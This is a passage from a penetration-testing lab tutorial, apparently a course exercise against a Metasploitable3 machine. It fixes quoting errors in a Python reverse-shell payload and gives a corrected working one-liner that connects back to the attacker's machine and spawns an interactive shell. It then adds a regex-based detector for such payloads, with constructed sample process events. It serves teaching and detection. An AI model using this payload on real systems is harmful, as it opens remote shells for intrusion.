In the previous section, we saw how we could use an exploit with different payloads to take advantage of a particular vulnerability that granted us remote access to the Metasploitable3 Ubuntu machine.

However, during the course of the previous exercise, the second payload we introduced, which we obtained from the internet, failed to establish a reverse connection to our Kali Linux attacker machine.

Take a few minutes to review the code of the new payload and try to identify the issue.

python_payload = f'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(({local_ip},{local_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"'
Indeed! The previous payload contains quoting errors. The inline Python handed to "python -c" is wrapped in double quotes, but the argument list ["/bin/sh","-i"] also uses double quotes, so the shell closes the -c argument early and the script is cut off. Additionally, the single quotes are missing around the IP address substituted for {local_ip}, so the interpreter sees a bare dotted number inside s.connect() instead of a string, which is a syntax error.

This is the code we should use for it to execute correctly.

Try replacing it in the exploit and launching it against the Metasploitable3 machine!

python_payload = f'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'{local_ip}\',{local_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"'
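Seen from the defender's side, a payload like this leaves a recognisable trace in process-creation telemetry: an interpreter started with -c whose inline code opens an outbound socket, binds stdin/stdout/stderr to it with dup2 and then spawns an interactive shell. The following is an added detection example (not part of the original exercise or of Metasploitable3); the sample events are constructed, the listener address 192.0.2.10 is a documentation-range placeholder, and the event field names (pid, ppid, cmdline) are assumed.

```python
import re
from typing import Optional

# Constructed process-creation events of the kind auditd or an EDR agent records.
# The first cmdline mirrors the corrected payload above; the others are benign noise.
SAMPLE_EVENTS = [
    {"pid": 4021, "ppid": 3990, "cmdline": "python -c \"import socket,subprocess,os;"
     "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.0.2.10',4444));"
     "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
     "p=subprocess.call(['/bin/sh','-i']);\""},
    {"pid": 4022, "ppid": 1, "cmdline": "python3 -c \"import json,sys;print(json.dumps(sys.argv))\""},
    {"pid": 4023, "ppid": 4021, "cmdline": "/bin/sh -i"},
    {"pid": 4024, "ppid": 1, "cmdline": "python3 -c \"import socket;print(socket.gethostname())\""},
]

# One pattern per stage of the inline reverse shell: outbound connect,
# standard descriptors bound to the socket, interactive shell spawned on top.
INDICATORS = {
    "outbound_connect": re.compile(r"socket\.socket\(.*?\).*?\.connect\(\s*\("),
    "stdio_redirect": re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)"),
    "shell_spawn": re.compile(
        r"(subprocess\.(call|Popen|run)|os\.system|os\.exec\w*|pty\.spawn)\(.*?/bin/(ba|z|da)?sh"),
}

# Matches "python", "python3", "python3.11" ... followed by optional flags and -c <code>.
INLINE_INTERPRETER = re.compile(r"^\S*python[\d.]*\s+(-\w+\s+)*-c\s+(?P<code>.+)$")


def inline_code(cmdline: str) -> Optional[str]:
    """Return the code passed via -c, or None if this is not an inline interpreter call."""
    m = INLINE_INTERPRETER.match(cmdline.strip())
    return m.group("code") if m else None


def matched_indicators(cmdline: str) -> list:
    """Names of the reverse-shell stages present in the inline code (empty if none)."""
    code = inline_code(cmdline)
    if code is None:
        return []
    return [name for name, pat in INDICATORS.items() if pat.search(code)]


def find_reverse_shells(events: list) -> list:
    """Flag inline-interpreter processes that show all three stages, and attach any
    child processes so an analyst sees the python -> /bin/sh -i chain in one record."""
    by_parent = {}
    for ev in events:
        by_parent.setdefault(ev["ppid"], []).append(ev)
    hits = []
    for ev in events:
        stages = matched_indicators(ev["cmdline"])
        if len(stages) == len(INDICATORS):
            children = [c["cmdline"] for c in by_parent.get(ev["pid"], [])]
            hits.append({"pid": ev["pid"], "stages": stages, "children": children})
    return hits
```

Requiring all three stages keeps ordinary "python -c" one-liners (JSON pretty-printing, hostname lookups) out of the alert queue, while matching on structure rather than the exact string means a payload with different quoting, variable names or shell path still fires.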